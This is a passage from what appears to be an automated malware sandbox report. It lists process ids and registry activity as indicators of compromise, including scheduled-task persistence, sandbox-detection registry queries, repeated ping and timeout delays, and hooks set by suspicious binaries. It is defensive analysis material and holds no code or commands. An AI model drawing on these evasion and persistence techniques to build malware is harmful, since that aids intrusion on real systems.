6140	PING.EXE
4340	PING.EXE
4368	PING.EXE
764	PING.EXE
7640	PING.EXE
7416	PING.EXE
7440	Process not Found
4744	PING.EXE
1364	PING.EXE
648	PING.EXE
7040	PING.EXE

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x001900000002ae38-2768.dat	nsis_installer_1
behavioral1/files/0x001900000002ae38-2768.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 19 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	njrtdhadawt.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	njrtdhadawt.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Delays execution with timeout.exe 4 IoCs

defense_evasion

pid	Process
1912	timeout.exe
7528	timeout.exe
4436	timeout.exe
6060	timeout.exe

Enumerates system info in registry 2 TTPs 15 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 2 IoCs

defense_evasion

pid	Process
1920	taskkill.exe
6832	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133822387838281832"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	shost.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000000000002000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	shost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3870231897-2573482396-1083937135-1000\{F416FC52-940E-4A5E-9493-AC78E231D58A}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	WinIntoruntime.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3870231897-2573482396-1083937135-1000\{C0D28BF8-9A0D-4F24-9D7B-6ACF98D0EC4F}	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	Portcrt.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1226833921"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000008b11c756af18db0111741d88b518db012c6ec822c16edb0114000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	staticfile.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3870231897-2573482396-1083937135-1000\{5266E606-525B-4340-88C4-30B870AC5D94}	chrome.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
5396	PING.EXE
716	PING.EXE
7480	PING.EXE
7940	PING.EXE
1364	PING.EXE
760	PING.EXE
8152	PING.EXE
6408	PING.EXE
7652	PING.EXE
7904	PING.EXE
6140	PING.EXE
5436	PING.EXE
4556	PING.EXE
4496	PING.EXE
5256	PING.EXE
7648	PING.EXE
6528	PING.EXE
1876	PING.EXE
3884	PING.EXE
7164	PING.EXE
7596	PING.EXE
7800	PING.EXE
7040	PING.EXE
2844	PING.EXE
5204	Process not Found
6352	PING.EXE
7680	PING.EXE
2212	PING.EXE
3000	PING.EXE
8008	PING.EXE
6140	PING.EXE
648	PING.EXE
5624	PING.EXE
7548	PING.EXE
4984	PING.EXE
2464	PING.EXE
1020	PING.EXE
3976	PING.EXE
3408	PING.EXE
4732	PING.EXE
5820	PING.EXE
4968	PING.EXE
6308	PING.EXE
2820	PING.EXE
7440	Process not Found
4924	PING.EXE
4380	PING.EXE
6840	Process not Found
3336	PING.EXE
1988	PING.EXE
3924	PING.EXE
2880	PING.EXE
8136	PING.EXE
7840	PING.EXE
5228	PING.EXE
4804	PING.EXE
7520	PING.EXE
3120	PING.EXE
7196	PING.EXE
3916	PING.EXE
3052	PING.EXE
7868	PING.EXE
4368	PING.EXE
7496	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2276	schtasks.exe
4244	schtasks.exe
456	schtasks.exe
3156	schtasks.exe
6240	schtasks.exe
8016	schtasks.exe
3284	schtasks.exe
3504	schtasks.exe
1308	schtasks.exe
5276	schtasks.exe
3076	schtasks.exe
1508	schtasks.exe
6160	schtasks.exe
5704	schtasks.exe
2260	schtasks.exe
5580	schtasks.exe
1480	schtasks.exe
6088	schtasks.exe
7584	schtasks.exe
7736	Process not Found
6696	schtasks.exe
6272	schtasks.exe
1336	schtasks.exe
3780	schtasks.exe
1560	schtasks.exe
664	schtasks.exe
4548	schtasks.exe
3156	schtasks.exe
7012	schtasks.exe
7132	schtasks.exe
4972	schtasks.exe
1304	schtasks.exe
2532	schtasks.exe
3684	schtasks.exe
8172	schtasks.exe
8036	schtasks.exe
3600	schtasks.exe
400	schtasks.exe
1636	schtasks.exe
6612	schtasks.exe
6848	schtasks.exe
3592	schtasks.exe
6752	schtasks.exe
2204	schtasks.exe
8044	schtasks.exe
432	schtasks.exe
404	schtasks.exe
6876	schtasks.exe
6076	schtasks.exe
3780	schtasks.exe
5500	schtasks.exe
2832	schtasks.exe
3368	schtasks.exe
3436	schtasks.exe
7364	schtasks.exe
2444	schtasks.exe
1096	schtasks.exe
2208	schtasks.exe
3264	schtasks.exe
1876	schtasks.exe
1096	schtasks.exe
244	schtasks.exe
7364	schtasks.exe
3884	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4844	EXCEL.EXE
3116	imagelogger.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
6072	chrome.exe
6072	chrome.exe
3672	msedge.exe
3672	msedge.exe
2372	msedge.exe
2372	msedge.exe
4524	identity_helper.exe
4524	identity_helper.exe
5220	msedge.exe
5220	msedge.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
872	Loader.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe
2764	Windows Defender.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5284	server.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1144	msn.exe
6208	cmd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 29 IoCs

pid	Process
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
6520	msedge.exe
6520	msedge.exe
6520	msedge.exe
6520	msedge.exe
6520	msedge.exe
6520	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5468	7zFM.exe
Token: 35	5468	7zFM.exe
Token: SeSecurityPrivilege	5468	7zFM.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe
Token: SeCreatePagefilePrivilege	6072	chrome.exe
Token: SeShutdownPrivilege	6072	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5468	7zFM.exe
5468	7zFM.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
6072	chrome.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
2344	2klz.exe
5760	2klz.exe
5440	2klz.exe
4416	2klz.exe
5596	2klz.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
388	chrome.exe
1148	2klz.exe
4720	2klz.exe
4336	2klz.exe
3056	2klz.exe
2008	Client.exe
5448	defenderx64.exe
1032	2klz.exe
4756	Client.exe
4800	defenderx64.exe
3248	2klz.exe
4868	Client.exe
4672	defenderx64.exe
5156	2klz.exe
1044	Client.exe
4808	defenderx64.exe
1304	2klz.exe
3764	Client.exe
1644	defenderx64.exe
2328	2klz.exe

Suspicious use of SetWindowsHookEx 57 IoCs

pid	Process
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe
2692	firefox.exe
4864	Agentnov.exe
6032	chrome.exe
3004	pothjadwtrgh.exe
6092	file.exe
1100	k360.exe
4844	EXCEL.EXE
4844	EXCEL.EXE
4844	EXCEL.EXE
4844	EXCEL.EXE
4844	EXCEL.EXE
4844	EXCEL.EXE
3056	2klz.exe
1032	2klz.exe
4756	Client.exe
1800	r2.exe
5156	2klz.exe
1304	2klz.exe
3764	Client.exe
2328	2klz.exe
5324	123.exe
